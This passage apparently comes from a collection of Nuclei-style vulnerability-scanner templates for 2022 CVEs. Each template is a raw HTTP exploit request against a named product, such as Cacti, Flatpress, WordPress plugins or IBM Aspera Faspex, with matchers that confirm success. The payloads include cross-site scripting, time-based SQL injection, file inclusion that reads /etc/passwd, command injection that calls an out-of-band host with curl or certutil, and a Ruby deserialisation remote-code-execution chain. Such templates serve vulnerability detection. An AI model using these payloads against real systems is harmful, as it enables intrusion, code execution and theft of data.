'javascript:alert(document.domain)';"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-40047","info":{"name":"Flatpress < v1.2.1 - Cross Site Scripting","severity":"medium"},"requests":[{"raw":["POST /login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=----WebKitFormBoundary{{randstring}}\n\n------WebKitFormBoundary{{randstring}}\nContent-Disposition: form-data; name=\"user\"\n\n{{username}}\n------WebKitFormBoundary{{randstring}}\nContent-Disposition: form-data; name=\"pass\"\n\n{{password}}\n------WebKitFormBoundary{{randstring}}\nContent-Disposition: form-data; name=\"submit\"\n\nLogin\n------WebKitFormBoundary{{randstring}}--\n","GET /admin.php?p=static&action=write&page=%22onfocus%3d%22alert%28document.domain%29%22autofocus%3d%22zr4da HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(body_2, \"flatpress\")","contains(content_type_2, \"text/html\")","contains(body_2, \"onfocus=\\\"alert(document.domain)\")"],"condition":"and"}]}]},{"id":"CVE-2022-30489","info":{"name":"Wavlink WN-535G3 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /cgi-bin/login.cgi HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nnewUI=1&page=login&username=admin&langChange=0&ipaddr=x.x.x.x&login_page=login.shtml&homepage=main.shtml&sysinitpage=sysinit.shtml&hostname=\")</script><script>alert(document.domain);</script>&key=M27234733&password=63a36bceec2d3bba30d8611c323f4cda&lang_=cn\n"],"matchers-condition":"and","matchers":[{"type":"word","words":["<script>alert(document.domain);</script>","parent.location.replace(\"http://\")"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-46169","info":{"name":"Cacti <=1.2.22 - Remote Command Injection","severity":"critical"},"requests":[{"raw":["GET /remote_agent.php?action=polldata&local_data_ids[0]=1&host_id=1&poller_id=;curl%20{{interactsh-url}}%20-H%20'User-Agent%3a%20{{useragent}}'; HTTP/1.1\nHost: {{Hostname}}\nX-Forwarded-For: 127.0.0.1\n"],"unsafe":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"value\":","\"local_data_id\":"],"condition":"and"},{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"word","part":"interactsh_request","words":["User-Agent: {{useragent}}"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-43140","info":{"name":"kkFileView 4.1.0 - Server-Side Request Forgery","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/getCorsFile?urlPath={{base64('https://oast.me')}}"],"matchers":[{"type":"word","part":"body","words":["<h1> Interactsh Server </h1>"]}]}]},{"id":"CVE-2022-0597","info":{"name":"Microweber < 1.2.11 - Open Redirection","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/api/logout?redirect_to=http://oast.pro/"],"matchers":[{"type":"regex","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?://|//)(?:[a-zA-Z0-9\\-_\\.@]*)oast\\.pro.*$"],"part":"header"}]}]},{"id":"CVE-2022-29299","info":{"name":"SolarView Compact 6.00 - 'time_begin' Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/Solar_History.php?time_begin=xx%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E%3C%22&time_end=&event_level=0&event_pcs=1&search_on=on&search_off=on&word=hj%27&sort_type=0&record=10&command=%95%5C%8E%A6"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<script>alert(document.domain)</script><\"\">","/Solar_History.php\" METHOD=\"post\">"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-42749","info":{"name":"CandidATS 3.0.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/ajax.php?f=getPipelineJobOrder&joborderID=50&page=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E&entriesPerPage=15&sortBy=dateCreatedInt&sortDirection=desc&indexFile=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E&isPopup=0"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<script>alert(document.domain)</script>","candidat"],"condition":"and"},{"type":"word","part":"header","words":["text/html"],"condition":"and"},{"type":"status","status":[404]}]}]},{"id":"CVE-2022-4063","info":{"name":"WordPress InPost Gallery <2.1.4.1 - Local File Inclusion","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-admin/admin-ajax.php?action=inpost_gallery_get_gallery&popup_shortcode_key=inpost_fancy&popup_shortcode_attributes=eyJwYWdlcGF0aCI6ICJmaWxlOi8vL2V0Yy9wYXNzd2QifQ=="],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["text/html"]},{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-25323","info":{"name":"ZEROF Web Server 2.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/admin.back<img%20src=x%20onerror=alert(document.domain)>"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["back<img src=x onerror=alert(document.domain)>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[401]}]}]},{"id":"CVE-2022-23102","info":{"name":"SINEMA Remote Connect Server < V2.0 - Open Redirect","severity":"medium"},"requests":[{"raw":["GET /wbm/login/?next=https%3A%2F%2Finteract.sh HTTP/1.1\nHost: {{Hostname}}\n","POST /wbm/login/?next=https%3A%2F%2Finteract.sh HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\nCookie: csrftoken={{csrf}};\nReferer: {{RootURL}}/wbm/login/?next=https%3A%2F%2Finteract.sh\n\ncsrfmiddlewaretoken={{csrf}}&utcoffset=330&username={{username}}&password={{password}}\n"],"matchers":[{"type":"regex","part":"header_2","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?:\\/\\/|\\/\\/|\\/\\\\\\\\|\\/\\\\)?(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh\\/?(\\/|[^.].*)?$"]}],"extractors":[{"type":"regex","name":"csrf","part":"body","group":1,"regex":["name='csrfmiddlewaretoken' value='(.*)' />"],"internal":true}]}]},{"id":"CVE-2022-25216","info":{"name":"DVDFab 12 Player/PlayerFab - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/download/C%3a%2fwindows%2fsystem.ini"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["bit app support","fonts","extensions"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-47945","info":{"name":"Thinkphp Lang - Local File Inclusion","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/?lang=../../thinkphp/base","{{BaseURL}}/?lang=../../../../../vendor/topthink/think-trace/src/TraceDebug"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["Call Stack","class=\"trace"],"condition":"and"},{"type":"status","status":[500]}]}]},{"id":"CVE-2022-47501","info":{"name":"Apache OFBiz < 18.12.07 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/solr/solrdefault/debug/dump?param=ContentStreams&stream.url=file://{{path}}"],"payloads":{"path":["/etc/passwd","c:/windows/win.ini"]},"stop-at-first-match":true,"matchers-condition":"or","matchers":[{"type":"dsl","dsl":["regex('root:.*:0:0:', body)","status_code == 200"],"condition":"and"},{"type":"dsl","dsl":["contains(body, 'bit app support')","contains(body, 'fonts')","contains(body, 'extensions')","status_code == 200"],"condition":"and"}]}]},{"id":"CVE-2022-46381","info":{"name":"Linear eMerge E3-Series - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/badging/badge_template_v0.php?layout=1&type=\"/><svg/onload=\"alert(document.domain)\"/>"],"matchers-condition":"and","matchers":[{"type":"word","words":["<svg/onload=\"alert(document.domain)\"/>","Badging Template"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-43016","info":{"name":"OpenCATS 0.9.6 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /index.php?m=login&a=attemptLogin HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nusername={{username}}&password={{password}}\n","GET /index.php?m=toolbar&callback=<script>alert(document.domain)</script>&a=authenticate HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["EVAL=<script>alert(document.domain)</script>","cats_connected"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-40032","info":{"name":"Simple Task Managing System v1.0 - SQL Injection","severity":"critical"},"requests":[{"raw":["@timeout: 15s\nPOST /task/loginValidation.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlogin=test'%20AND%20(SELECT%208979%20FROM%20(SELECT(SLEEP(7-(IF(ORD(MID((SELECT%20DISTINCT(IFNULL(CAST(schema_name%20AS%20NCHAR)%2c0x20))%20FROM%20INFORMATION_SCHEMA.SCHEMATA%20LIMIT%200%2c1)%2c12%2c1))%3e48%2c0%2c1)))))jaXJ)--%20HgKq&password=\n"],"matchers":[{"type":"dsl","dsl":["duration>=7","status_code == 302","contains(location, 'login.php')","contains(content_type, \"text/html\")"],"condition":"and"}]}]},{"id":"CVE-2022-32015","info":{"name":"Complete Online Job Search System 1.0 - SQL Injection","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?q=category&search=Banking%27%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,md5({{num}}),15,16,17,18,19--+"],"matchers":[{"type":"word","part":"body","words":["{{md5({{num}})}}"]}]}]},{"id":"CVE-2022-0437","info":{"name":"karma-runner DOM-based Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/karma.js","{{BaseURL}}/?return_url=javascript:alert(document.domain)"],"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["compare_versions(version, '< 6.3.14')"]},{"type":"word","part":"body_2","words":["Karma"]},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"version","group":1,"regex":["(?m)VERSION: '([0-9.]+)'"],"internal":true}]}]},{"id":"CVE-2022-47966","info":{"name":"ManageEngine - Remote Command Execution","severity":"critical"},"requests":[{"raw":["POST /SamlResponseServlet HTTP/2\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nSAMLResponse={{url_encode(base64(SAMLResponse))}}&RelayState=\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["dns"]},{"type":"word","part":"body","words":["Unknown error occurred while processing your request"]},{"type":"status","status":[500]}]}]},{"id":"CVE-2022-0666","info":{"name":"Microweber < 1.2.11 - CRLF Injection","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/api/logout?redirect_to=%0d%0aSet-Cookie:crlfinjection=1;"],"matchers":[{"type":"regex","part":"header","regex":["^Set-Cookie: crlfinjection=1;"]}]}]},{"id":"CVE-2022-44290","info":{"name":"WebTareas 2.4p5 - SQL Injection","severity":"critical"},"requests":[{"raw":["POST /general/login.php?session=false HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=---------------------------3023071625140724693672385525\n\n-----------------------------3023071625140724693672385525\nContent-Disposition: form-data; name=\"action\"\n\nlogin\n-----------------------------3023071625140724693672385525\nContent-Disposition: form-data; name=\"loginForm\"\n\n{{username}}\n-----------------------------3023071625140724693672385525\nContent-Disposition: form-data; name=\"passwordForm\"\n\n{{password}}\n-----------------------------3023071625140724693672385525\nContent-Disposition: form-data; name=\"loginSubmit\"\n\nLog In\n-----------------------------3023071625140724693672385525--\n","@timeout: 20s\nGET /approvals/deleteapprovalstages.php?id=1)+AND+(SELECT+3830+FROM+(SELECT(SLEEP(6)))MbGE)+AND+(6162=6162 HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["duration>=6","status_code == 200","contains(header, \"text/html\")","contains(body, 'Delete the following?')"],"condition":"and"}]}]},{"id":"CVE-2022-34045","info":{"name":"WAVLINK WN530HG4 - Improper Access Control","severity":"critical"},"requests":[{"raw":["GET /backupsettings.dat HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["Salted__"]},{"type":"word","part":"header","words":["application/octet-stream"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-0948","info":{"name":"WordPress Order Listener for WooCommerce <3.2.2 - SQL Injection","severity":"critical"},"requests":[{"raw":["@timeout: 15s\nPOST /?rest_route=/olistener/new HTTP/1.1\nHost: {{Hostname}}\ncontent-type: application/json\n\n{\"id\":\" (SLEEP(6))#\"}\n","GET /wp-content/plugins/woc-order-alert/assets/admin/js/scripts.js HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["duration_1>=6","status_code_1 == 200","contains(content_type_1, \"application/json\")","contains(body_2, \"olistener-action.olistener-controller\")"],"condition":"and"}]}]},{"id":"CVE-2022-0540","info":{"name":"Atlassian Jira Seraph - Authentication Bypass","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/InsightPluginShowGeneralConfiguration.jspa;","{{BaseURL}}/secure/WBSGanttManageScheduleJobAction.jspa;"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["General Insight Configuration"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-23881","info":{"name":"ZZZCMS zzzphp 2.1.0 - Remote Code Execution","severity":"critical"},"requests":[{"raw":["GET /?location=search HTTP/1.1\nHost: {{Hostname}}\nCookies: keys={if:=`certutil -urlcache -split -f https://{{interactsh-url}}/poc`}{end if}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"status","status":[500]}]}]},{"id":"CVE-2022-43167","info":{"name":"Rukovoditel <= 3.2.1 - Cross Site Scripting","severity":"medium"},"requests":[{"raw":["GET /index.php?module=users/login HTTP/1.1\nHost: {{Hostname}}\n","POST /index.php?module=users/login&action=login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nform_session_token={{nonce}}&username={{username}}&password={{password}}\n","POST /index.php?module=users_alerts/users_alerts&action=save&token={{nonce}} HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nform_session_token={{nonce}}&type=warning&title=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&description=&location=all&start_date=&end_date=\n"],"redirects":true,"max-redirects":2,"matchers":[{"type":"dsl","dsl":["status_code_3 == 200","contains(body_3, \"<script>alert(document.domain)</script>\")","contains(body_3, \"rukovoditel\")"],"condition":"and"}],"extractors":[{"type":"regex","name":"nonce","group":1,"regex":["id=\"form_session_token\" value=\"(.*)\" type=\"hidden\""],"internal":true}]}]},{"id":"CVE-2022-0747","info":{"name":"Infographic Maker iList < 4.3.8 - SQL Injection","severity":"critical"},"requests":[{"raw":["@timeout: 20s\nPOST /wp-admin/admin-ajax.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\naction=qcld_upvote_action&post_id=1+AND+(SELECT+1626+FROM+(SELECT(SLEEP(6)))niPH)\n","GET /wp-content/plugins/infographic-and-list-builder-ilist/assets/js/ilist_custom_admin.js HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["duration_1>=6","status_code_2 == 200","contains(content_type_2, \"text/javascript\")","contains(body_2, \"show_ilist_templates\")"],"condition":"and"}]}]},{"id":"CVE-2022-27593","info":{"name":"QNAP QTS Photo Station External Reference - Local File Inclusion","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/photo/combine.php?type=javascript&g=core-r7rules/../../../hello.php."],"matchers-condition":"and","matchers":[{"type":"word","part":"response","words":["!function(p,qa){","module.exports","application/javascript"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-1058","info":{"name":"Gitea <1.16.5 - Open Redirect","severity":"medium"},"requests":[{"raw":["GET /user/login HTTP/1.1\nHost: {{Hostname}}\n","POST /user/login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\nCookie: redirect_to=//interact.sh\n\n_csrf={{csrf}}&user_name={{username}}&password={{url_encode(password)}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"header_2","words":["//interact.sh"]},{"type":"status","status":[302]}],"extractors":[{"type":"regex","name":"csrf","group":1,"regex":["name=\"_csrf\" value=\"(.*)\""],"internal":true}]}]},{"id":"CVE-2022-39986","info":{"name":"RaspAP 2.8.7 - Unauthenticated Command Injection","severity":"critical"},"requests":[{"raw":["POST /ajax/openvpn/del_ovpncfg.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\ncfg_id=;id;#\n"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["uid=([0-9(a-z-)]+) gid=([0-9(a-z-)]+) groups=([0-9(a-z-)]+)"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-2034","info":{"name":"WordPress Sensei LMS <4.5.0 - Information Disclosure","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-json/wp/v2/sensei-messages/{{num}}"],"payloads":{"num":"helpers/wordlists/numbers.txt"},"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["sensei_message","guid\":{\"rendered\":"],"condition":"and"},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-34576","info":{"name":"WAVLINK WN535 G3 - Improper Access Control","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/cgi-bin/ExportAllSettings.sh"],"matchers-condition":"and","matchers":[{"type":"word","words":["Login=","Password=","Model=","AuthMode="],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-1916","info":{"name":"WordPress Active Products Tables for WooCommerce <1.0.5 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-admin/admin-ajax.php?action=woot_get_smth&what={%22call_action%22:%22x%22,%22more_data%22:%22\\u003cscript%3Ealert(document.domain)\\u003c/script%3E%22}"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<script>alert(document.domain)</script>"]},{"type":"word","part":"body","words":["woot-content-in-popup","woot-system","woot-table"],"condition":"or"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-28923","info":{"name":"Caddy 2.4.6 - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/%5C%5Cinteract.sh/%252e%252e%252f"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?:\\/\\/|\\/\\/|\\/\\\\\\\\|\\/\\\\)(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh\\/?(\\/|[^.].*)?$"]}]}]},{"id":"CVE-2022-0535","info":{"name":"WordPress E2Pdf <1.16.45 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/admin.php?page=e2pdf-settings HTTP/1.1\nHost: {{Hostname}}\n","POST /wp-admin/admin.php?page=e2pdf-settings HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\n_nonce={{nonce}}&e2pdf_user_email=&e2pdf_api=api.e2pdf.com&e2pdf_connection_timeout=300&e2pdf_processor=0&e2pdf_dev_update=0&e2pdf_url_format=siteurl&e2pdf_mod_rewrite=0&e2pdf_mod_rewrite_url=e2pdf%2F%25uid%25%2F&e2pdf_cache=0&e2pdf_cache=1&e2pdf_cache_fonts=0&e2pdf_cache_fonts=1&e2pdf_debug=0&e2pdf_hide_warnings=0&e2pdf_images_remote_request=0&e2pdf_images_timeout=30&e2pdf_revisions_limit=3&e2pdf_memory_time=0&e2pdf_developer=0&e2pdf_developer_ips=%3C%2Ftextarea%3E%3Csvg%2Fonload%3Dalert%28document.domain%29%3E&submit=Save+Changes\n","GET /wp-admin/admin.php?page=e2pdf-settings HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["contains(body_4, 'placeholder=\\\"Developer IPs\\\" ></textarea><svg/onload=alert(document.domain)>')","contains(header_4, \"text/html\")","status_code_4 == 200"],"condition":"and"}],"extractors":[{"type":"regex","name":"nonce","group":1,"regex":["name=\"_nonce\" value=\"([0-9a-zA-Z]+)\""],"internal":true}]}]},{"id":"CVE-2022-0208","info":{"name":"WordPress Plugin MapPress <2.73.4 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/?mapp_iframe=1&mapid=--%3E%3Cimg%20src%20onerror=alert(document.domain)%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["text/html"]},{"type":"word","part":"body","words":["<img src onerror=alert(document.domain)>","Bad mapid"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-44950","info":{"name":"Rukovoditel <= 3.2.1 - Cross Site Scripting","severity":"medium"},"requests":[{"raw":["GET /index.php?module=users/login HTTP/1.1\nHost: {{Hostname}}\n","POST /index.php?module=users/login&action=login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nform_session_token={{nonce}}&username={{username}}&password={{password}}\n","POST /index.php?module=entities/fields&action=save&token={{nonce}} HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryfKx13B5QBU5Sccgf\n\n------WebKitFormBoundaryfKx13B5QBU5Sccgf\nContent-Disposition: form-data; name=\"form_session_token\"\n\n{{nonce}}\n------WebKitFormBoundaryfKx13B5QBU5Sccgf\nContent-Disposition: form-data; name=\"entities_id\"\n\n24\n------WebKitFormBoundaryfKx13B5QBU5Sccgf\nContent-Disposition: form-data; name=\"forms_tabs_id\"\n\n29\n------WebKitFormBoundaryfKx13B5QBU5Sccgf\nContent-Disposition: form-data; name=\"name\"\n\n<script>alert(document.domain)</script>\n------WebKitFormBoundaryfKx13B5QBU5Sccgf\nContent-Disposition: form-data; name=\"short_name\"\n\ntest\n------WebKitFormBoundaryfKx13B5QBU5Sccgf\nContent-Disposition: form-data; name=\"type\"\n\nfieldtype_input\n------WebKitFormBoundaryfKx13B5QBU5Sccgf\nContent-Disposition: form-data; name=\"fields_configuration[width]\"\n\ninput-small\n------WebKitFormBoundaryfKx13B5QBU5Sccgf\nContent-Disposition: form-data; name=\"fields_configuration[default_value]\"\n\n\n------WebKitFormBoundaryfKx13B5QBU5Sccgf\nContent-Disposition: form-data; name=\"fields_configuration[is_unique]\"\n\n0\n------WebKitFormBoundaryfKx13B5QBU5Sccgf\nContent-Disposition: form-data; name=\"fields_configuration[unique_error_msg]\"\n\n\n------WebKitFormBoundaryfKx13B5QBU5Sccgf\nContent-Disposition: form-data; name=\"required_message\"\n\n\n------WebKitFormBoundaryfKx13B5QBU5Sccgf\nContent-Disposition: form-data; name=\"tooltip\"\n\n\n------WebKitFormBoundaryfKx13B5QBU5Sccgf\nContent-Disposition: form-data; name=\"tooltip_item_page\"\n\n\n------WebKitFormBoundaryfKx13B5QBU5Sccgf\nContent-Disposition: form-data; name=\"access_template\"\n\n\n------WebKitFormBoundaryfKx13B5QBU5Sccgf\nContent-Disposition: form-data; name=\"access[5]\"\n\nyes\n------WebKitFormBoundaryfKx13B5QBU5Sccgf\nContent-Disposition: form-data; name=\"access[4]\"\n\nyes\n------WebKitFormBoundaryfKx13B5QBU5Sccgf\nContent-Disposition: form-data; name=\"notes\"\n\n\n------WebKitFormBoundaryfKx13B5QBU5Sccgf--\n"],"redirects":true,"max-redirects":3,"matchers":[{"type":"dsl","dsl":["status_code_3 == 200","contains(content_type_3, \"text/html\")","contains(body_3, \"<script>alert(document.domain)</script>\")","contains(body_3, \"rukovoditel\")"],"condition":"and"}],"extractors":[{"type":"regex","name":"nonce","group":1,"regex":["id=\"form_session_token\" value=\"(.*)\" type=\"hidden\""],"internal":true}]}]},{"id":"CVE-2022-47986","info":{"name":"IBM Aspera Faspex <=4.4.2 PL1 - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /aspera/faspex/package_relay/relay_package HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\nContent-Type: application/json\n\n{\"package_file_list\": [\"/\"], \"external_emails\": \"\\n---\\n- !ruby/object:Gem::Installer\\n    i: x\\n- !ruby/object:Gem::SpecFetcher\\n    i: y\\n- !ruby/object:Gem::Requirement\\n  requirements:\\n    !ruby/object:Gem::Package::TarReader\\n    io: &1 !ruby/object:Net::BufferedIO\\n      io: &1 !ruby/object:Gem::Package::TarReader::Entry\\n         read: 0\\n         header: \\\"pew\\\"\\n      debug_output: &1 !ruby/object:Net::WriteAdapter\\n         socket: &1 !ruby/object:PrettyPrint\\n             output: !ruby/object:Net::WriteAdapter\\n                 socket: &1 !ruby/module \\\"Kernel\\\"\\n                 method_id: :eval\\n             newline: \\\"throw `id`\\\"\\n             buffer: {}\\n             group_stack:\\n              - !ruby/object:PrettyPrint::Group\\n                break: true\\n         method_id: :breakable\\n\", \"package_name\": \"{{rand_base(4)}}\", \"package_note\": \"{{randstr}}\", \"original_sender_name\": \"{{randstr}}\", \"package_uuid\": \"d7cb6601-6db9-43aa-8e6b-dfb4768647ec\", \"metadata_human_readable\": \"Yes\", \"forward\": \"pew\", \"metadata_json\": \"{}\", \"delivery_uuid\": \"d7cb6601-6db9-43aa-8e6b-dfb4768647ec\", \"delivery_sender_name\": \"{{rand_base(8)}}\", \"delivery_title\": \"{{rand_base(4)}}\", \"delivery_note\": \"{{rand_base(4)}}\", \"delete_after_download\": true, \"delete_after_download_condition\": \"IDK\"}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["text/html"]},{"type":"regex","regex":["uid=\\d+\\(([^)]+)\\) gid=\\d+\\(([^)]+)\\)"]},{"type":"status","status":[500]}]}]},{"id":"CVE-2022-0651","info":{"name":"WordPress Plugin WP Statistics <= 13.1.5 - SQL Injection","severity":"high"},"requests":[{"raw":["GET / HTTP/1.1\nHost: {{Hostname}}\n","@timeout: 20s\nGET /wp-json/wp-statistics/v2/hit?_=11&_wpnonce={{nonce}}&wp_statistics_hit_rest=&browser=&platform=&version=&referred=&ip=11.11.11.11&exclusion_match=no&exclusion_reason&ua=Something&track_all=1&timestamp=11&current_page_type=home'-sleep(6)-'&current_page_id=0&search_query&page_uri=/&user_id=0 HTTP/1.1\nHost: {{Hostname}}\n"],"host-redirects":true,"matchers":[{"type":"dsl","dsl":["duration>=6","status_code == 200","contains(header, \"application/json\")","contains(body, 'Visitor Hit was recorded successfully')"],"condition":"and"}],"extractors":[{"type":"regex","name":"nonce","group":1,"regex":["_wpnonce=([0-9a-zA-Z]+)"],"internal":true}]}]},{"id":"CVE-2022-43164","info":{"name":"Rukovoditel <= 3.2.1 - Cross Site Scripting","severity":"medium"},"requests":[{"raw":["GET /index.php?module=users/login HTTP/1.1\nHost: {{Hostname}}\n","POST /index.php?module=users/login&action=login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nform_session_token={{nonce}}&username={{username}}&password={{password}}\n","POST /index.php?module=global_lists/lists&action=save&token={{nonce}} HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nform_session_token={{nonce}}&name=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&notes=\n"],"redirects":true,"max-redirects":2,"matchers":[{"type":"dsl","dsl":["status_code_3 == 200","contains(body_3, \"<script>alert(document.domain)</script>\")","contains(body_3, \"rukovoditel\")"],"condition":"and"}],"extractors":[{"type":"regex","name":"nonce","group":1,"regex":["id=\"form_session_token\" value=\"(.*)\" type=\"hidden\""],"internal":true}]}]},{"id":"CVE-2022-3908","info":{"name":"WordPress Helloprint <1.4.7 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/admin.php?page=language-translate.php&success=added\"><script>alert(`XSS`)<%2Fscript> HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(content_type_2, \"text/html\")","contains(body_2, \"Translation added\\\\\\\"><script>alert(`XSS`)</script> successfully\")"],"condition":"and"}]}]},{"id":"CVE-2022-2314","info":{"name":"WordPress VR Calendar <=2.3.2 - Remote Code Execution","severity":"critical"},"requests":[{"raw":["GET /wp-content/plugins/vr-calendar-sync/assets/js/public.js HTTP/1.1\nHost: {{Hostname}}\n","GET /wp-admin/admin-post.php?vrc_cmd=phpinfo HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body_2","words":["phpinfo","PHP Version"],"condition":"and"},{"type":"word","part":"body_1","words":["vrc-calendar"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-2733","info":{"name":"Openemr < 7.0.0.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /interface/main/main_screen.php?auth=login&site=default HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{RootURL}}\nContent-Type: 